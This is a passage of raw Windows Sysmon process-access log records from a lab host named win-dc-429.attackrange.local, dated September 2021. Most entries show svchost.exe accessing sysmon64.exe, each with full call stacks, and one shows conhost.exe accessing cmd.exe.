09:20:17.537{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053360Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.537{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053359Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.537{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053358Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.537{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053357Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.537{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053356Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.537{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053355Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.537{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053354Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.521{5EBD8912-8CD1-6151-3300-00000000FD01}33563384C:\Windows\system32\conhost.exe{5EBD8912-8CD1-6151-3200-00000000FD01}3348C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053353Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053352Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053351Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053350Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053349Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053348Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053347Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053346Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053345Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053344Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053343Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053342Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053341Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053340Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053339Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053338Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053337Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\K